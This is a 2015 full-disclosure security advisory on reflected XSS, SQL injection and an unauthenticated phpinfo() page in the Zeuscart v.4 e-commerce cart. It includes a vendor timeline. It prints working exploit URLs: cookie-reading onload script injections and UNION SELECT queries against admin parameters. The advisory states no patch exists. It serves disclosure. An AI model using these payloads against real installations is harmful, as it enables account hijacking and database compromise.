Advisory: Multiple reflecting XSS-, SQLi and InformationDisclosure-vulnerabilities in Zeuscart v.4 Advisory ID: SROEADV-2015-12 Author: Steffen Rösemann Affected Software: Zeuscart v.4 Vendor URL: Vendor Status: pending CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Software used for research: Mac OS X 10.10, Firefox 35.0.1 ========================== Vulnerability Description: ========================== ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and InformationDisclosure-vulnerabilities. ================== Technical Details: ================== ==== XSS === Reflecting XSS-vulnerabilities can be found in a common Zeuscart-installation in the following locations and could be exploited for example by crafting a link and make a registered user click on that link. The parameter "search", which is used in the index.php is vulnerable to XSS-attacks. Exploit-Example: http:// {TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!-- By appending arbitrary HTML- and/or JavaScript-code to the parameter "schltr" which is as well used in index.php, an attacker could exploit this XSS-vulnerable parameter: Exploit-Example: http:// {TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E The third XSS-vulnerability can be found in the "brand"-parameter, which is again used in index.php. Exploit-Example: http:// {TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E ==== SQLi ==== The SQL injection-vulnerabilities can be found in the administrative backend of Zeuscart v. 4 and reside in the following locations in a common installation. By appending arbitrary SQL statements to the "id"-parameter, an attacker could exploit this SQL injection vulnerability: Exploit-Example: http:// {TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+ Another SQL injection vulnerability can be found here and can be exploited by appending SQL statements to the vulnerable "cid"-parameter: Exploit-Example: http:// {TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+ The last SQL injection vulnerability I found can be found in the following location and can be exploited by appending SQL statements to the vulnerable "id" parameter: http:// {TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+ ============== Information Disclosure ============== The administrative backend of Zeuscart v. 4 allows the admin to use a functionality, which displays the PHP-installation settings via phpinfo(): http://{TARGET}/admin/?do=getphpinfo Unfortunately, the PHP-script does not check, if an authorized admin executes this functionality: It is possible even for unregistered users to request the above link to see the informations, phpinfo() displays. That could expose sensitive informations to an attacker which could lead to further exploitation. ========= Solution: ========= Vendor has been notified. After releasing a patch, which seems not to correct the issues, the vendor decided not to respond anymore to figure out a solution together. Currently, there is no patch available to secure Zeuscart-installations. ==================== Disclosure Timeline: ==================== 21-Jan-2015 – found the vulnerabilities 21-Jan-2015 - informed the developers (see [3]) 21-Jan-2015 – release date of this security advisory [without technical details] 21-Jan-2015 – fork of the repository to keep the vulnerable version available for other researchers (see [5]) 22-Jan-2015 - vendor responded, provided detailed information 04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are still exploitable, which has been reported to the vendor (see [3]) 19-Feb-2015 - asked the vendor again, if he will patch these issues (see [3]); vendor did not respond 21-Feb-2015 - release date of this security advisory 21-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] [2] [3] [4] [5]